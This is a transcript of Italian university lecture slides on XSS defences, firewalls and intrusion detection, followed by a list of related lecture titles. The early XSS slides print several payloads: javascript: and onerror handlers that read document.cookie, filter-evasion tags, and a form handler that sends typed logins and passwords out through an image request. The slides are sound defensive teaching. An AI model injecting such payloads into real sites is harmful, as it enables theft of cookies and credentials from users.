Elementi di Sicurezza e Privatezza Lezione 15 Firewall and IDS. Chiara Braghin

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Elementi di Sicurezza e Privatezza Lezione 15 Firewall and IDS. Chiara Braghin"

Transcript

1 Elementi di Sicurezza e Privatezza Lezione 15 Firewall and IDS Chiara Braghin

2 XSS: difese a lato server

3 Come proteggersi? Assicurarsi che l applicazione verifichi tutti gli header, cookie, query, campi dei form (anche quelli hidden!) tenendo a mente cosa è permesso e cosa non lo è Conviene avere una politica che specifica COSA È PERMESSO, e non cosa sia negato. 2

4 Validazione dell input Mai fidarsi dei dati provenienti dal client Rimuovere/codificare i caratteri speciali Verificare la presenza di alcuni tag 3

5 Filtrare l output Rimuovere/cifrare i caratteri speciali (X)HTML < per <, > per >, &quot per Permettere solo comandi safe (e.g., no <script> ) Attenzione 1: Controllare trucchi anti-filtro Quoting malformato: <IMG ><SCRIPT>alert( XSS ) Attenzione 2: Gli script non si trovano solo dentro <script>! 4

6 Scripts non solo in <script>! JavaScript as scheme in URI <img src= javascript:alert(document.cookie); > JavaScript On{event} attributes (handlers) OnSubmit, OnError, OnLoad, Typical use: <img src= none OnError= alert(document.cookie) > <iframe src=` onload=`steal()`> <form> action="logon.jsp" method="post" onsubmit="hackimg=new Image; hackimg.src=' +document.for ms(1).login.value'+':'+ document.forms(1).password.value;" </form> 5

7 Problemi con i filtri Si supponga che un filtro rimuova <script Caso OK: <script src=... src=... Però <scr<scriptipt src=... <script src=... 6

8 XSS: difese a lato client

9 Come difendersi? Proxy-based Analizzare il traffico HTTP scambiato tra il browser e il Web server cercando (e rimuovendo o codificando) caratteri speciali Application-level firewall Analizzare le pagine HTML cercando dei link che possono rilasciare informazioni sensibili Blocccare richieste cattive Auditing system Monitorare l esecuzione di codice JavaScript e confrontarle con una politica ad alto livello 8

10 Outline di oggi Vi ricordate le 3 parole chiave per garantire un sistema sicuro? Prevenzione Rilevamento Reazione Oggi: Firewall: prevenzione tramite protezione perimetrale Intrusion detection system (IDS): rilevamento 9

11 Firewall

12 Firewall Sistema di controllo degli accessi che verifica tutto il traffico in transito Consente o nega il passaggio del traffico basandosi su una politica di sicurezza Funzioni: verifica pacchetti in transito blocca pacchetti non autorizzati e/o pericolosi maschera indirizzi interni (classi di indirizzi IP riservate e non instradabili ) (NAT, Network Address Translation) 11

13 Firewall: scenario di base Separa la LAN dal resto della rete Tutti i pacchetti tra la LAN e il resto della rete vengono instradati attraverso il firewall Firewall Local network Internet Router 12

14 Firewall: DMZ (1) DMZ: De-Militarized Zone Una o più sottoreti accessibili con connessioni dall'esterno (e dallʼinterno) della rete ma filtrati dal firewall Gli host della DMZ non possono connettersi alla rete interna Contiene i server che devono essere accessibili dallʼesterno e/o dalla rete interna server server DNS server Web 13

15 Firewall: DMZ (2) 14

16 Firewall: politiche di sicurezza (1) Il firewall applica delle regole per stabilire se far passare o meno i pacchetti è utile solo quando le regole vengono configurate in modo appropriato Per tutte le sottoreti protette da un firewall si possono definire diverse politiche di accesso realizza una separazione in zone aventi diverso grado di sicurezza nellʼarchitettura di rete 15

17 Firewall: politiche di sicurezza (2) Serve una specifica ad alto livello della politica di sicurezza default deny: tutto viene bloccato tranne quello che è autorizzato (politica chiusa) default allow: tutto viene permesso tranne quello che non è autorizzato (politica aperta) 16

18 Tipi di Firewall Network layer Packet filtering Stateful packet filtering Application layer Circuit level Application proxy 17

19 Packet filter (1) Filtra i pacchetti solo sulla base delle informazioni nellʼheader del pacchetto TCP i valori dei campi degli header dei pacchetti vengono confrontati con le regole della politica e ammessi o scartati a seconda del risultato del confronto Header indirizzo sorgente indirizzo destinazione porta sorgente porta destinazione tipo di protocollo opzioni di protocollo 18

20 Packet filter (2) Non si può tracciare la correlazione tra pacchetti in una trasmissione Ogni pacchetto viene esaminato singolarmente, indipendentemente dai pacchetti precedenti e da quelli successivi Non si possono esaminare problemi a livello (OSI) più alto 19

21 Regole di filtraggio (1) Indirizzi IP usati per chiudere/aprire il traffico da determinate sorgenti a determinate destinazioni Numeri di porta usati per bloccare/permettere servizi noti (porta 80?) Bloccare un protocollo Combinazioni dei precedenti 20

22 Regole di filtraggio (2) Esempi di regole: Se un pacchetto arriva sullʼinterfaccia esterna del firewall ed ha un mittente della rete interna lo si blocca Verifica di spoofing (falsificazione dellʼidentità) Se un pacchetto arriva dallʼesterno e fa parte di una connessione ftp non accettarlo Accettare solo connessioni sicure (SFTP - SSH File Transfer Protocol, o FTPS - FTP over SSL) 21

23 Regole di filtraggio (3) Come vengono valutate le regole? Le regole di filtraggio memorizzate in uno specifico ordine Viene utilizzata la prima regola incontrata con la quale cʼè corrispondenza Se una regola blocca la trasmissione o ricezione del pacchetto, il pacchetto è rifiutato Se una regola permette la trasmissione o ricezione di un pacchetto, il pacchetto è permesso Se il pacchetto non soddisfa nessuna regola si applica la regola di default (deny all o allow all) 22

24 Regole di filtraggio (4) Di solito vengono definite tramite la seguente tabella (variante standard CISCO): Direzione IP sorgente IP destinazione Protocollo Porta sorgente Porta destinazione Flag ACK Azione Flag ACK: se il protocollo è TCP, il suo valore può essere 0, 1 o 0/1; ** per altri protocolli In una connessione TCP: Server port: < 1024 Client port: tra 1024 e

25 Politica di sicurezza: esempio (1) Permettere la connessione tra i client in rete = ed il servizio SMTP (tcp/25) di qualsiasi host esterno Possibile tabella: Direzione IP sorgente IP destinazione Protocollo Porta sorgente Porta destinazione Flag ACK Azione OUT rete ANY TCP >= ANY permit IN ANY rete TCP 25 >= permit 24

26 Politica di sicurezza: esempio (2) Problemi: Non cʼè modo di garantire che il ritorno del pacchetto di conferma (TCP ACK) venga dalla stessa connessione Porte nel range [1024, 16383] disponibili per i client per ricevere le risposte, ma: potrebbe essere la risposta legittima di un server ad una connessione stabilita precedentemente potrebbe essere traffico illecito Politica troppo lasca! 25

27 Stateful (dynamic) packet filtering (1) Simile al packet filter ma state-aware Distingue le nuove connessioni da quelle già aperte tabelle di stato per le connessioni aperte ogni pacchetto viene esaminato sia singolarmente che in relazione ai pacchetti precedentemente ricevuti e appartenenti alla stessa sessione Prestazioni migliori rispetto a packet filter 26

28 Stateful (dynamic) packet filtering (2) 27

29 Firewall: architettura Software su processori general purpose sistema più economico e flessibile Software su processori GP (Gigahertz processor) Hardware dedicato (router) soluzione più costosa e spesso basata su software proprietario 28

30 Firewall: limiti Controlla tutto e solo il traffico che lo attraversa intrusioni interne non sono individuate Se le connessioni arrivano attraverso un percorso non controllato, il firewall non serve utente connesso via modem Non controllano file infetti da virus 29

31 Intrusion Detection Systems

32 Audit di sicurezza Audit = attività atte a misurare la conformità di determinati processi, strutture o procedure a determinate caratteristiche richieste Usato in due diverse accezioni: Analisi delle procedure e delle pratiche adottate per valutare le eventuali vulnerabilità Analisi degli eventi per determinare violazioni alla sicurezza o tentativi di violazioni 31

33 Aree di intervento Sicurezza organizzativa verifica delle responsabilità politiche aziendali Sicurezza logica e fisica valutazione protezione da accessi non autorizzati valutazione protezione da eventi di natura umana o ambientale (es., dispositivi antincendio, backup) valutazione protezione dellʼinfrastruttura di rete valutazione protezione di server e client Sicurezza delle applicazioni verifica protezione dei sistemi applicativi rispetto alle tipologie di rischio intrinseco e implementativo 32

34 Analisi dei rischi Identificazione e valutazione dei rischi che si verifichi un certo evento Meccanismi per tenere i rischi sotto controllo Valutazione della probabilità che accada un rishio Valutazione dellʼimpatto di ciascun rischio Determinazione di contromisure Sviluppo e utilizzo di misure per mitigare gli effetti di un rischio Determinazione della gravità di un rischio e scelta delle contromisure appropriate 33

35 Tool per lʼanalisi automatica Riducono la quantità di dati che devono essere analizzati manualmente Sistemi per la determinazione di intrusioni (intrusion detection system) Acquisizione e analisi svolti in contemporanea 34

36 Intrusion detection system (IDS) - 1 Gli IDS sono sistemi di monitoraggio rilevano attacchi generano allarmi, non prevengono intrusioni Fasi di un IDS: 1. Raccolta dati 2. Analisi 3. Risposta 35

37 Intrusion detection system (IDS) - 2 Idee di base: 1. Chi entra in un sistema abusivamente compie operazioni che un utente normale non fa 2. Gli attacchi spesso sono associati ad una violazione del controllo dellʼaccesso buffer overflow utente esterno ottiene accesso a risorse protette programma e/o file modificati 36

38 IDS: requisiti Deve poter essere eseguito senza la supervisione degli utenti Non deve essere una scatola nera il suo comportamento interno dovrebbe essere analizzabile dallʼesterno Deve essere resistente ai guasti Deve essere resistente ad attacchi Deve richiedere un basso overhead Deve essere facilmente adattabile al sistema in osservazione Deve far fronte a cambiamenti nel comportamento del sistema 37

39 IDS: classificazione (1) Due tecniche di analisi dei dati: Anomaly detection: segnala eventuali (e significative) deviazioni dal modello normale di comportamento Misuse detection: segnala lʼeventuale comparsa di eventi che rispecchiano schemi predefiniti di attacchi Richiede una conoscenza a priori dei possibili attacchi 38

40 IDS: classificazione (2) Utilizza dati differenti: HIDS (Host-based Intrusion Detection System): dati relative allʼattivita locale di un singolo computer (log di sistema, accesso a file critici, ecc, ) visibilità migliore dei comportamenti di una applicazione in esecuzione sulla macchina NIDS (Network-based Intrusion Detection System): controlla il traffico di rete Un singolo NIDS può proteggere diverse macchine 39

41 Anomaly detection Basati sulla definizione di profili dʼuso che descrivono il normale funzionamento costruiti manualmente (difficile!) attraverso tecniche di machine learning e data mining Anomalie: deviazioni dai profili deviazione rispetto dati statistici Capace di riconoscere nuovi attacchi 40

42 Anomaly detection: profili Definiti in base a determinate caratteristiche (metriche) che vengono monitorate dal sistema Attività di login e sessione frequenza login ultimo login tentativi di specifica password falliti Esecuzione di programmi e comandi frequenza di esecuzione risorse di CPU e I/O usate Attività di accesso a file frequenza di read/write/create/delete numero record letti/scritti numero letture/scritture/cancellazioni/creazioni falliti 41

43 Esempio: sequenze di sys call Costruisce delle tracce durante la normale esecuzione del programma Comportamento di esempio (sys calls) open read write open mmap write fchmod close Alcune tracce vengono memorizzate (lung = 4) open read write open read write open mmap write open mmap write open mmap write fchmod mmap write fchmod close Riporta un anomalia se la sequenza seguente viene osservata: open read read open mmap write fchmod close 42

44 Anomaly detection: problemi Scelta delle metriche (cosa misurare) Scelta dei modelli di base: cosa succede se lʼattacco compare solo in variabili che non sono state modellate? Segnalazione di tipo statistico che va interpretata da un esperto umano Scelta dei threshold (soglia di allarme) 43

45 Misuse detection Si basa sulla descrizione dei tipi di attacco (caratteristiche invarianti di attacchi noti) Riconosce solo attacchi per cui esiste una descrizione (signature) Usa un modello di regole per descrivere gli attacchi Pro: Genera segnalazioni precise Contro: Riconosce solo attacchi noti 44

46 Misuse detection: problemi Necessità di gestire un repository degli attacchi Problemi di aggiornamento (solo gli attacchi conosciuti vengono segnalati) Problema di generazione delle signature degli attacchi 45

47 Host-based IDS HIDS è in grado di monitorare attività a livello di singolo utente Vantaggi: Scopre la presenza di rootkit Svantaggi: necessario un IDS per ogni macchina se un attaccante ottiene il controllo della macchina può modificare IDS e lʼaudit log solo visione locale di un attacco Esempi di HIDS: Tripwire (controlla integrità file) 46

48 Network-based IDS Ispezionano traffico di rete Cerca violazioni a protocolli pattern di connessioni inusuali stringhe di attacco nei payload dei pacchetti Svantaggi: non sono in grado di ispezionare traffico crittato non tutti gli attacchi arrivano dalla rete memorizzza ed elabora una grande quantità di traffico Esempi di NIDS Snort, Bro 47

49 Falsi positivi e falsi negativi Falsi positivi: Allarmi provocati da eventi legittimi le politiche di sicurezza in realtà non vengono violate causa interruzioni non necessarie causa insoddisfazioni negli utenti Falsi negativi: Allarmi mancati in presenza di eventi illegittimi le politiche di sicurezza sono violate intrusione non rilevata evento illegittimo interpretato come legittimo 48

50 IDS: problemi Mancanza di dati interessanti Molti network normali, system call data Pochi dati su attacchi realistici, anomalie Difficile scegliere il valore soglia Alcuni attacchi possono rientrare nei limiti di attività normali Falsi positivi/negativi sono molto costosi 49

Elementi di Sicurezza e Privatezza Lezione 10 Firewall and IDS

Elementi di Sicurezza e Privatezza Lezione 10 Firewall and IDS Elementi di Sicurezza e Privatezza Lezione 10 Firewall and IDS Chiara Braghin chiara.braghin@unimi.it Firewall Firewall Sistema di controllo degli accessi che verifica tutto il traffico in transito Consente

Dettagli

Sicurezza dei calcolatori e delle reti

Sicurezza dei calcolatori e delle reti Sicurezza dei calcolatori e delle reti Proteggere la rete: tecnologie Lez. 11 A.A. 2010/20011 1 Firewall I firewall sono probabilmente la tecnologia per la protezione dagli attacchi di rete più diffusa

Dettagli

Sicurezza architetturale, firewall 11/04/2006

Sicurezza architetturale, firewall 11/04/2006 Sicurezza architetturale, firewall 11/04/2006 Cos è un firewall? Un firewall è un sistema di controllo degli accessi che verifica tutto il traffico che transita attraverso di lui Consente o nega il passaggio

Dettagli

Difesa perimetrale di una rete

Difesa perimetrale di una rete Muro tagliafuoco per: Evitare accessi indesiderati Controllare traffico di dati in uscita Tagliare i flussi di I/O generati da malware Filtrare i segmenti di una VLAN azione Tipi di firewall: Ingress firewall

Dettagli

Sicurezza nelle applicazioni multimediali: lezione 9, firewall. I firewall

Sicurezza nelle applicazioni multimediali: lezione 9, firewall. I firewall I firewall Perché i firewall sono necessari Le reti odierne hanno topologie complesse LAN (local area networks) WAN (wide area networks) Accesso a Internet Le politiche di accesso cambiano a seconda della

Dettagli

Università degli Studi di Pisa Dipartimento di Informatica. NAT & Firewalls

Università degli Studi di Pisa Dipartimento di Informatica. NAT & Firewalls Università degli Studi di Pisa Dipartimento di Informatica NAT & Firewalls 1 NAT(NETWORK ADDRESS TRANSLATION) MOTIVAZIONI NAT(Network Address Translation) = Tecnica di filtraggio di pacchetti IP con sostituzione

Dettagli

Prof. Filippo Lanubile

Prof. Filippo Lanubile Firewall e IDS Firewall Sistema che costituisce l unico punto di connessione tra una rete privata e il resto di Internet Solitamente implementato in un router Implementato anche su host (firewall personale)

Dettagli

Elementi di Sicurezza e Privatezza. Proteggere la rete: tecnologie Lez. 13

Elementi di Sicurezza e Privatezza. Proteggere la rete: tecnologie Lez. 13 Elementi di Sicurezza e Privatezza Proteggere la rete: tecnologie Lez. 13 Firewall I firewall sono probabilmente la tecnologia per la protezione dagli attacchi di rete più diffusa Un Internet firewall,

Dettagli

Dispositivi di rete 10 Docente: Marco Sechi Modulo 1 ROUTER È un dispositivo di rete che si posiziona sul livello 3 del modello OSI. Pertanto un Router (dall'inglese instradatore) è un dispositivo che

Dettagli

FIREWALL. Firewall - modello OSI e TCP/IP. Gianluigi Me. me@disp.uniroma2.it Anno Accademico 2005/06. Modello OSI. Modello TCP/IP. Application Gateway

FIREWALL. Firewall - modello OSI e TCP/IP. Gianluigi Me. me@disp.uniroma2.it Anno Accademico 2005/06. Modello OSI. Modello TCP/IP. Application Gateway FIREWALL me@disp.uniroma2.it Anno Accademico 2005/06 Firewall - modello OSI e TCP/IP Modello TCP/IP Applicazione TELNET FTP DNS PING NFS RealAudio RealVideo RTCP Modello OSI Applicazione Presentazione

Dettagli

Firewall. Protezione perimetrale e sistemi anti intrusione

Firewall. Protezione perimetrale e sistemi anti intrusione Firewall Protezione perimetrale e sistemi anti intrusione Dispositivi di sicurezza Internet è un ambiente poco sicuro. Si rischia di subire ogni tipo di frode. Per l amministratore della rete di una organizzazione

Dettagli

FIREWALL OUTLINE. Introduzione alla sicurezza delle reti. firewall. zona Demilitarizzata

FIREWALL OUTLINE. Introduzione alla sicurezza delle reti. firewall. zona Demilitarizzata FIREWALL OUTLINE Introduzione alla sicurezza delle reti firewall zona Demilitarizzata SICUREZZA DELLE RETI Ambra Molesini ORGANIZZAZIONE DELLA RETE La principale difesa contro gli attacchi ad una rete

Dettagli

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella

Laboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017 Ing. Niccolò Iardella niccolo.iardella@unifi.it 1 Esercitazione 7 Configurazione del firewall 2 Programma

Dettagli

Sicurezza applicata in rete

Sicurezza applicata in rete Sicurezza applicata in rete Contenuti del corso La progettazione delle reti Il routing nelle reti IP Il collegamento agli Internet Service Provider e problematiche di sicurezza Analisi di traffico e dei

Dettagli

Architetture e strumenti per la sicurezza informatica

Architetture e strumenti per la sicurezza informatica Università Politecnica delle Marche Architetture e strumenti per la sicurezza informatica Ing. Gianluca Capuzzi Agenda Premessa Firewall IDS/IPS Auditing Strumenti per l analisi e la correlazione Strumenti

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

IDS: Intrusion detection systems

IDS: Intrusion detection systems IDS/IPS/Honeypot IDS: Intrusion detection systems Tentano di rilevare: attività di analisi della rete tentativi di intrusione intrusioni avvenute comportamenti pericolosi degli utenti traffico anomalo

Dettagli

Firewall Intrusion Detection System

Firewall Intrusion Detection System Firewall Intrusion Detection System Damiano Carra Università degli Studi di Verona Dipartimento di Informatica Parte I: Firewall 2 Firewall! I Firewall di rete sono apparecchiature o sistemi che controllano

Dettagli

Sicurezza delle reti 1

Sicurezza delle reti 1 1 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo 2.5 Italia

Dettagli

Crittografia e sicurezza delle reti. Firewall

Crittografia e sicurezza delle reti. Firewall Crittografia e sicurezza delle reti Firewall Cosa è un Firewall Un punto di controllo e monitoraggio Collega reti con diversi criteri di affidabilità e delimita la rete da difendere Impone limitazioni

Dettagli

Proteggere la rete I FIREWALL (seconda parte)

Proteggere la rete I FIREWALL (seconda parte) Proteggere la rete I FIREWALL (seconda parte) Index Architetture di rete con Firewall A cosa serve il NAT Cosa sono gli Intrusion Detection System Esistono molte architetture possibili per inserire un

Dettagli

Organizzazione della rete

Organizzazione della rete Network Security Elements of Network Security Protocols Organizzazione della rete Il firewall La zona demilitarizzata (DMZ) System security Organizzazione della rete La principale difesa contro gli attacchi

Dettagli

Firewall. Corso di Sicurezza su Reti Lezione del 15 Dicembre Pacchetti. Filtraggio di pacchetti

Firewall. Corso di Sicurezza su Reti Lezione del 15 Dicembre Pacchetti. Filtraggio di pacchetti Firewall Barbara Masucci Dipartimento di Informatica ed Applicazioni Università di Salerno masucci@dia.unisa.it http://www.dia.unisa.it/professori/masucci Pacchetti I messaggi sono divisi in pacchetti

Dettagli

Sicurezza delle reti 1

Sicurezza delle reti 1 delle delle 1 Mattia Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo

Dettagli

Firewall e NAT A.A. 2005/2006. Walter Cerroni. Protezione di host: personal firewall

Firewall e NAT A.A. 2005/2006. Walter Cerroni. Protezione di host: personal firewall Firewall e NAT A.A. 2005/2006 Walter Cerroni Protezione di host: personal firewall Un firewall è un filtro software che serve a proteggersi da accessi indesiderati provenienti dall esterno della rete Può

Dettagli

Firewall. Pacchetti. Filtraggio di pacchetti: Regole. Filtraggio di pacchetti

Firewall. Pacchetti. Filtraggio di pacchetti: Regole. Filtraggio di pacchetti Firewall Pacchetti I messaggi sono divisi in pacchetti I pacchetti sono trasmessi in modo indipendente Barbara Masucci Dipartimento di Informatica ed Applicazioni Università di Salerno masucci@dia.unisa.it

Dettagli

Sicurezza delle reti. Monga TLS/SSL. A livello di trasporto. Sicurezza perimetrale

Sicurezza delle reti. Monga TLS/SSL. A livello di trasporto. Sicurezza perimetrale delle delle dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2015/16 Lezione VI: 1 cba 2011 15 M.. Creative Commons Attribuzione Condividi

Dettagli

La sicurezza delle reti

La sicurezza delle reti La sicurezza delle reti Inserimento dati falsi Cancellazione di dati Letture non autorizzate A quale livello di rete è meglio realizzare la sicurezza? Applicazione TCP IP Data Link Physical firewall? IPSEC?

Dettagli

ACCESS CONTROL LIST. ACCESS CONTROL LIST standard

ACCESS CONTROL LIST. ACCESS CONTROL LIST standard ACCESS CONTROL LIST Le ACL (Access Control List) sono una lista di istruzioni da applicare alle interfacce di un router allo scopo di gestire il traffico, filtrando i pacchetti in entrata e in uscita.

Dettagli

I protocolli di rete. Mauro Gaspari

I protocolli di rete. Mauro Gaspari I protocolli di rete Mauro Gaspari 1 La comunicazione in rete è basata sul concetto di Standard Definizione: uno standard di rete è costituito da un insieme di regole e convenzioni che specificano come

Dettagli

INFORMATICA GENERALE - MODULO 2 CdS in Scienze della Comunicazione. CRISTINA GENA cgena@di.unito.it http://www.di.unito.it/~cgena/

INFORMATICA GENERALE - MODULO 2 CdS in Scienze della Comunicazione. CRISTINA GENA cgena@di.unito.it http://www.di.unito.it/~cgena/ INFORMATICA GENERALE - MODULO 2 CdS in Scienze della Comunicazione CRISTINA GENA cgena@di.unito.it http://www.di.unito.it/~cgena/ INTRANET & EXTRANET Intranet Con questo termine s intende l uso delle tecnologie

Dettagli

PACKET FILTERING IPTABLES

PACKET FILTERING IPTABLES PACKET FILTERING IPTABLES smox@shadow:~# date Sat Nov 29 11:30 smox@shadow:~# whoami Omar LD2k3 Premessa: Le condizioni per l'utilizzo di questo documento sono quelle della licenza standard GNU-GPL, allo

Dettagli

Studio di reti di sensori con comportamento ciclico con il simulatore Castalia. Corso di Laurea in Informatica

Studio di reti di sensori con comportamento ciclico con il simulatore Castalia. Corso di Laurea in Informatica Studio di reti di sensori con comportamento ciclico con il simulatore Castalia Corso di Laurea in Informatica Candidato Andrea Di Saverio Relatori Maria Cristina Pinotti Alfredo Navarra Anno accademico

Dettagli

Firewall. Che cosa proteggere? Pacchetti. Filtraggio di pacchetti: Regole. Filtraggio di pacchetti. Filtraggio di pacchetti: perché?

Firewall. Che cosa proteggere? Pacchetti. Filtraggio di pacchetti: Regole. Filtraggio di pacchetti. Filtraggio di pacchetti: perché? Firewall Pacchetti I messaggi sono divisi in pacchetti I pacchetti sono trasmessi in modo indipendente Alfredo De Santis Dipartimentodi Informatica ed Applicazioni Università di Salerno 1 Filtraggio di

Dettagli

Elementi sull uso dei firewall

Elementi sull uso dei firewall Laboratorio di Reti di Calcolatori Elementi sull uso dei firewall Carlo Mastroianni Firewall Un firewall è una combinazione di hardware e software che protegge una sottorete dal resto di Internet Il firewall

Dettagli

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall Il firewall ipfw Introduzione ai firewall classificazione Firewall a filtraggio dei pacchetti informazioni associate alle regole interpretazione delle regole ipfw configurazione impostazione delle regole

Dettagli

Antonio Cianfrani. Standard Access Control List (ACL)

Antonio Cianfrani. Standard Access Control List (ACL) Antonio Cianfrani Standard Access Control List (ACL) Indice Cosa sono le ACL? Interfacce Inbound & Outbound Wildcard mask Configurare una ACL standard ACL extended (prossima lezione) Named ACL (prossima

Dettagli

Firewalls. Outline. Ing. Davide Ariu

Firewalls. Outline. Ing. Davide Ariu Pattern Recognition and Applications Lab Firewalls Ing. Davide Ariu Dipartimento di Ingegneria Elettrica ed Elettronica Università di Cagliari, Italia Outline Cosa è un Firewall Funzionalità di un Firewall

Dettagli

INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO. Introduzione e scopo del documento SICUREZZA... 8

INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO. Introduzione e scopo del documento SICUREZZA... 8 Introduzione e scopo del documento INDICE INTRODUZIONE E SCOPO DEL DOCUMENTO ORGANIZZAZIONE DEL DOCUMENTO SICUREZZA... 8 1.1 INTRODUZIONE... 9 1.1.1 MOTIVAZIONI: PERCHÉ SERVE LA SICUREZZA... 9 1.1.2 CONFIDENZIALITÀ,

Dettagli

Petra Internet Firewall Corso di Formazione

Petra Internet Firewall Corso di Formazione Petra Internet Framework Simplifying Internet Management Link s.r.l. Petra Internet Firewall Corso di Formazione Argomenti Breve introduzione ai Firewall: Definizioni Nat (masquerade) Routing, Packet filter,

Dettagli

MODELLI ISO/OSI e TCP/IP

MODELLI ISO/OSI e TCP/IP PARTE I - Reti di Calcolatori ed Internet MODELLI ISO/OSI e TCP/IP 2.1 Reti di Calcolatori Livelli e Servizi Il modello OSI Il modello TCP/IP Un confronto tra OSI e TCP/IP ARPANET Ethernet Reti ATM reti

Dettagli

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione Sesta Esercitazione Sommario Introduzione ai firewall Definizione e scopo Classificazione Firewall a filtraggio dei pacchetti Informazioni associate alle regole Interpretazione delle regole Il firewall

Dettagli

Che cos è un firewall? Firewall e IDS/IPS

Che cos è un firewall? Firewall e IDS/IPS Che cos è un firewall? Firewall e IDS/IPS firewall = muro tagliafuoco collegamento controllato tra reti a diverso livello di sicurezza = sicurezza del perimetro (filtro di ) Antonio Lioy < lioy @ polito.it

Dettagli

Proteggere la rete: I FIREWALL

Proteggere la rete: I FIREWALL Proteggere la rete: I FIREWALL Index Start up Firewall A cosa servono i Firewall Cosa è un Firewall Come si configurano Le principali applicazioni dei Firewall StartUp Firewall La tecnologia dei Firewall

Dettagli

Corso MIUR C2 Modulo 8. Firewall. Ing. Giampaolo Mancini Ing. Fabio De Vito

Corso MIUR C2 Modulo 8. Firewall. Ing. Giampaolo Mancini Ing. Fabio De Vito Corso MIUR C2 Modulo 8 Firewall Ing. Giampaolo Mancini Ing. Fabio De Vito 11/02/04 15.15.03 Sommario Concetto di firewalling Funzionalità di un firewall Filtro sui pacchetti in ingresso Filtro sui pacchetti

Dettagli

La sicurezza nel Web

La sicurezza nel Web La sicurezza nel Web Protezione vs. Sicurezza Protezione: garantire un utente o un sistema della non interazione delle attività che svolgono in unix ad esempio i processi sono protetti nella loro esecuzione

Dettagli

Modulo 8. Architetture per reti sicure Terminologia

Modulo 8. Architetture per reti sicure Terminologia Pagina 1 di 7 Architetture per reti sicure Terminologia Non esiste una terminologia completa e consistente per le architetture e componenti di firewall. Per quanto riguarda i firewall sicuramente si può

Dettagli

MODELLI ISO/OSI e TCP/IP

MODELLI ISO/OSI e TCP/IP PARTE I - Reti di Calcolatori ed Internet MODELLI ISO/OSI e TCP/IP Reti di Calcolatori Livelli e Servizi Il modello OSI Il modello TCP/IP Un confronto tra OSI e TCP/IP ARPANET Ethernet Reti ATM reti wireless

Dettagli

Esercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio

Esercitazione 05. Sommario. Packet Filtering [ ICMP ] Esercitazione Descrizione generale. Angelo Di Iorio Sommario Esercitazione 05 Angelo Di Iorio Packet Filtering ICMP Descrizione esercitazione Applicazioni utili: Firewall: wipfw - netfilter Packet sniffer: wireshark ALMA MATER STUDIORUM UNIVERSITA DI BOLOGNA

Dettagli

maurizio pizzonia sicurezza dei sistemi informatici e delle reti. esercizi su sicurezza delle reti

maurizio pizzonia sicurezza dei sistemi informatici e delle reti. esercizi su sicurezza delle reti 20062010 maurizio pizzonia sicurezza dei sistemi informatici e delle reti esercizi su sicurezza delle reti 1 20062010 maurizio pizzonia sicurezza dei sistemi informatici e delle reti screened subnet gastone.2

Dettagli

Internet (- working). Le basi.

Internet (- working). Le basi. Internet (- working). Le basi. 1 GABRIELLA PAOLINI (GARR) 18 OTTOBRE 2011 Capire come funziona Internet 2 FACCIAMO UN PASSO INDIETRO Internet È un insieme di reti interconnesse fra di loro su tutto il

Dettagli

Introduzione al NATTING

Introduzione al NATTING Introduzione al NATTING I Router CISCO sono in grado di svolgere funzioni proprie di un firewall, in particolare possono effettuare la trasformazione degli indirizzi IP PRIVATI usati dai pc della rete

Dettagli

Filtraggio del traffico IP in linux

Filtraggio del traffico IP in linux Filtraggio del traffico IP in linux Laboratorio di Amministrazione di Sistemi L-A Dagli appunti originali di Fabio Bucciarelli - DEIS Cos è un firewall? E un dispositivo hardware o software, che permette

Dettagli

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00

Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00 Prova di Esame - Rete Internet (ing. Giovanni Neglia) Lunedì 24 Gennaio 2005, ore 15.00 NB: alcune domande hanno risposta multipla: si richiede di identificare TUTTE le risposte corrette. Cognome: Nome:

Dettagli

Esercitazione 05. Prima di iniziare. Packet Filtering [ ICMP ] Sommario. Angelo Di Iorio (Paolo Marinelli)

Esercitazione 05. Prima di iniziare. Packet Filtering [ ICMP ] Sommario. Angelo Di Iorio (Paolo Marinelli) Prima di iniziare L ultima lezione (lunedì 7/12) sarà dedicata alla correzione dei quiz e discussione di eventuali dubbi e chiarimenti Esercitazione 05 Termine di consegna dei report: 8 Gennaio 2010, ore

Dettagli

Internet e protocollo TCP/IP

Internet e protocollo TCP/IP Internet e protocollo TCP/IP Internet Nata dalla fusione di reti di agenzie governative americane (ARPANET) e reti di università E una rete di reti, di scala planetaria, pubblica, a commutazione di pacchetto

Dettagli

I firewall. I firewall

I firewall. I firewall I firewall Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Che cos è un firewall? firewall = muro tagliafuoco collegamento controllato tra reti a diverso livello di

Dettagli

